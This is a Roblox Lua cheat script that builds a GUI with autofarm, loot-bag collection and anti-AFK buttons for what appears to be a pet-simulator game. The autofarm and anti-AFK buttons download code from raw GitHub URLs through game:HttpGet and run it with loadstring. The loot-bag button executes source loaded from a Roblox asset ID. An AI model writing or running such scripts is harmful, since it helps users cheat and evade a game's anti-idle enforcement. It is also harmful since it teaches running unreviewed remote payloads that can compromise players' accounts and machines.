local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local autofarm = Instance.new("TextButton")
local collectlootbags = Instance.new("TextButton")
local title = Instance.new("TextLabel")
local titlev2 = Instance.new("TextLabel")
local UICorner_2 = Instance.new("UICorner")
local antiafk = Instance.new("TextButton")

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
main.Position = UDim2.new(0.329797506, 0, 0.239999995, 0)
main.Size = UDim2.new(0.317261338, 0, 0.562962949, 0)
main.Active = true
main.Draggable = true

UICorner.CornerRadius = UDim.new(0, 15)
UICorner.Parent = main

autofarm.Name = "autofarm"
autofarm.Parent = main
autofarm.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
autofarm.BorderSizePixel = 0
autofarm.Position = UDim2.new(0.168141842, 0, 0.177506894, 0)
autofarm.Size = UDim2.new(0.653495312, 0, 0.134042963, 0)
autofarm.Font = Enum.Font.SourceSansBold
autofarm.Text = "AUTOFARM"
autofarm.TextColor3 = Color3.fromRGB(255, 0, 0)
autofarm.TextScaled = true
autofarm.TextSize = 14.000
autofarm.TextWrapped = true

collectlootbags.Name = "collectlootbags"
collectlootbags.Parent = main
collectlootbags.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
collectlootbags.Position = UDim2.new(0.170206547, 0, 0.429331809, 0)
collectlootbags.Size = UDim2.new(0.656534791, 0, 0.13667126, 0)
collectlootbags.Font = Enum.Font.SourceSansBold
collectlootbags.Text = "COLLECT LOOTBAGS"
collectlootbags.TextColor3 = Color3.fromRGB(255, 0, 0)
collectlootbags.TextScaled = true
collectlootbags.TextSize = 14.000
collectlootbags.TextWrapped = true

title.Name = "title"
title.Parent = main
title.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
title.Position = UDim2.new(0.00573340897, 0, 0, 0)
title.Size = UDim2.new(0.99426657, 0, 0.118273206, 0)
title.Font = Enum.Font.GothamBlack
title.Text = "Script GUI By: Matix"
title.TextColor3 = Color3.fromRGB(255, 0, 0)
title.TextScaled = true
title.TextSize = 14.000
title.TextStrokeColor3 = Color3.fromRGB(255, 0, 0)
title.TextWrapped = true

titlev2.Name = "titlev2"
titlev2.Parent = main
titlev2.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
titlev2.BorderSizePixel = 0
titlev2.Position = UDim2.new(0, 0, 0.881726801, 0)
titlev2.Size = UDim2.new(0.999999881, 0, 0.118273206, 0)
titlev2.Font = Enum.Font.GothamBlack
titlev2.Text = "Use RightShift to close the gui"
titlev2.TextColor3 = Color3.fromRGB(255, 0, 0)
titlev2.TextScaled = true
titlev2.TextSize = 14.000
titlev2.TextWrapped = true

UICorner_2.CornerRadius = UDim.new(0, 15)
UICorner_2.Parent = titlev2

antiafk.Name = "antiafk"
antiafk.Parent = main
antiafk.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
antiafk.Position = UDim2.new(0.170206547, 0, 0.679479718, 0)
antiafk.Size = UDim2.new(0.656534791, 0, 0.13667126, 0)
antiafk.Font = Enum.Font.SourceSansBold
antiafk.Text = "ANTIAFK"
antiafk.TextColor3 = Color3.fromRGB(255, 0, 0)
antiafk.TextScaled = true
antiafk.TextSize = 14.000
antiafk.TextWrapped = true

-- Scripts:

local function AIGYU_fake_script() -- ScreenGui.LocalScript 
	local script = Instance.new('LocalScript', ScreenGui)

	local main = script.Parent.main
	local Opened = false
	
	local PositionClosed = UDim2.new(0.331, 0,2, 0)
	local PositionOpened = UDim2.new(0.331, 0,0.24, 0)
	
	local UserInputService = game:GetService("UserInputService")
	
	UserInputService.InputBegan:Connect(function(KeyCode)
		if KeyCode.KeyCode == Enum.KeyCode.RightShift then
			if Opened then
				main:TweenPosition((PositionClosed), "InOut", "Quint")
				Opened = false
			else
				main:TweenPosition((PositionOpened), "InOut", "Quart")
				Opened = true
			end
		end
	end)
end
coroutine.wrap(AIGYU_fake_script)()
local function YHUEC_fake_script() -- autofarm.LocalScript 
	local script = Instance.new('LocalScript', autofarm)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/si1nnx/psxx/main/g"))()
	end)
end
coroutine.wrap(YHUEC_fake_script)()
local function ELIW_fake_script() -- collectlootbags.LocalScript 
	local script = Instance.new('LocalScript', collectlootbags)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:GetObjects("rbxassetid://8194485654")[1].Source)("Petsi-X")
	end)
end
coroutine.wrap(ELIW_fake_script)()
local function OZTR_fake_script() -- antiafk.LocalScript 
	local script = Instance.new('LocalScript', antiafk)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/gdsfnf/anti-kick/main/anti%20kick"))();
	end)
end
coroutine.wrap(OZTR_fake_script)()
